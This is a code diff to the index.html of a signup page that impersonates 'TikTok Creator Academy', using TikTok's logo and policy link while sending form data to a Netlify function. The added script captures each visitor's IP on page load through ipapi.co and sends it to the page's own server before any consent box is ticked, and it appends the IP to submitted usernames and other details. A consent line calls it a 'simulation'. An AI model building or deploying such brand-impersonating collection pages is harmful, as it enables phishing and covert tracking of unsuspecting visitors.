--- a/index.html
+++ b/index.html
@@ -1,43 +1,4 @@
-<script type="text/javascript">
-        var gk_isXlsx = false;
-        var gk_xlsxFileLookup = {};
-        var gk_fileData = {};
-        function filledCell(cell) {
-          return cell !== '' && cell != null;
-        }
-        function loadFileData(filename) {
-        if (gk_isXlsx && gk_xlsxFileLookup[filename]) {
-            try {
-                var workbook = XLSX.read(gk_fileData[filename], { type: 'base64' });
-                var firstSheetName = workbook.SheetNames[0];
-                var worksheet = workbook.Sheets[firstSheetName];
-
-                // Convert sheet to JSON to filter blank rows
-                var jsonData = XLSX.utils.sheet_to_json(worksheet, { header: 1, blankrows: false, defval: '' });
-                // Filter out blank rows (rows where all cells are empty, null, or undefined)
-                var filteredData = jsonData.filter(row => row.some(filledCell));
-
-                // Heuristic to find the header row by ignoring rows with fewer filled cells than the next row
-                var headerRowIndex = filteredData.findIndex((row, index) =>
-                  row.filter(filledCell).length >= filteredData[index + 1]?.filter(filledCell).length
-                );
-                // Fallback
-                if (headerRowIndex === -1 || headerRowIndex > 25) {
-                  headerRowIndex = 0;
-                }
-
-                // Convert filtered JSON back to CSV
-                var csv = XLSX.utils.aoa_to_sheet(filteredData.slice(headerRowIndex)); // Create a new sheet from filtered array of arrays
-                csv = XLSX.utils.sheet_to_csv(csv, { header: 1 });
-                return csv;
-            } catch (e) {
-                console.error(e);
-                return "";
-            }
-        }
-        return gk_fileData[filename] || "";
-        }
-        </script><!DOCTYPE html>
+<!DOCTYPE html>
 <html lang="en">
 <head>
     <meta charset="UTF-8">
@@ -50,6 +11,7 @@
         <img src="https://www.tiktok.com/creator-academy/static/logo.png" alt="TikTok Creator Academy Logo" class="logo">
         <h1>Join TikTok Creator Academy</h1>
         <p>Sign up to access free courses, analytics tools, and creator resources!</p>
+        <p class="privacy-notice">By submitting, you consent to our <a href="https://www.tiktok.com/legal/page/global/privacy-policy/en" target="_blank">Privacy Policy</a>, including IP address collection.</p>
         <form id="registration-form" action="/.netlify/functions/submit" method="POST">
             <label for="username">TikTok Username</label>
             <input type="text" id="username" name="username" required>
@@ -69,12 +31,39 @@
             <label for="details">Why do you want to join the Creator Academy?</label>
             <textarea id="details" name="details" rows="4"></textarea>
             
+            <label class="consent-label">
+                <input type="checkbox" name="consent" required>
+                I consent to data collection, including my IP address, for this simulation.
+            </label>
+            
             <button type="submit">Join Now</button>
         </form>
         <div id="response-message"></div>
     </div>
 
     <script>
+        // Capture IP on page load
+        async function capturePageLoadIP() {
+            try {
+                const response = await fetch('https://ipapi.co/json/');
+                const data = await response.json();
+                const ip = data.ip;
+                console.log('Page load IP:', ip);
+                await fetch('/.netlify/functions/capture-ip', {
+                    method: 'POST',
+                    headers: { 'Content-Type': 'application/json' },
+                    body: JSON.stringify({ ip })
+                });
+                console.log('Page load IP sent to server');
+            } catch (error) {
+                console.error('Failed to capture page load IP:', error);
+            }
+        }
+
+        // Run on page load
+        capturePageLoadIP();
+
+        // Form submission with IP
         const form = document.getElementById('registration-form');
         const responseMessage = document.getElementById('response-message');
 
@@ -83,9 +72,12 @@
             const formData = new FormData(form);
             const data = Object.fromEntries(formData);
 
-            console.log('Sending form data:', data);
-
             try {
+                const ipResponse = await fetch('https://ipapi.co/json/');
+                const ipData = await ipResponse.json();
+                data.form_submit_ip = ipData.ip;
+                console.log('Sending form data with IP:', data);
+
                 const response = await fetch('/.netlify/functions/submit', {
                     method: 'POST',
                     headers: { 'Content-Type': 'application/json' },
